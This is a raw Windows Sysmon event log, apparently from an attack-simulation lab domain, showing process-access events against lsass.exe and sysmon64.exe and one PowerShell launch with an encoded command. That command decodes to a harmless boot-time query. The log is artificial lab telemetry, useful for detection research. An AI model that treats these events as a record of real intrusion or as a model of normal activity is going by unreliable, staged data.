10341000x8000000000000000619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.294{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:22.294{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.294{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
11241100x8000000000000000616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.263{59A5CD1D-8E22-6005-DD02-00000000A201}3540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_s0baoo0u.xcr.ps12021-01-18 13:33:22.263 10341000x8000000000000000615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.247{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E22-6005-DD02-00000000A201}3540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.232{59A5CD1D-8E22-6005-DB02-00000000A201}24481708C:\Windows\system32\conhost.exe{59A5CD1D-8E22-6005-DD02-00000000A201}3540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8C95-6005-0500-00000000A201}6401196C:\Windows\system32\csrss.exe{59A5CD1D-8E22-6005-DD02-00000000A201}3540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8E22-6005-DC02-00000000A201}45364408C:\Windows\system32\cmd.exe{59A5CD1D-8E22-6005-DD02-00000000A201}3540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
154100x8000000000000000602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.229{59A5CD1D-8E22-6005-DD02-00000000A201}3540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E22-6005-CF16-110000000000}0x1116cf0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E22-6005-DC02-00000000A201}4536C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x8000000000000000601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8E22-6005-DB02-00000000A201}24481708C:\Windows\system32\conhost.exe{59A5CD1D-8E22-6005-DC02-00000000A201}4536C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 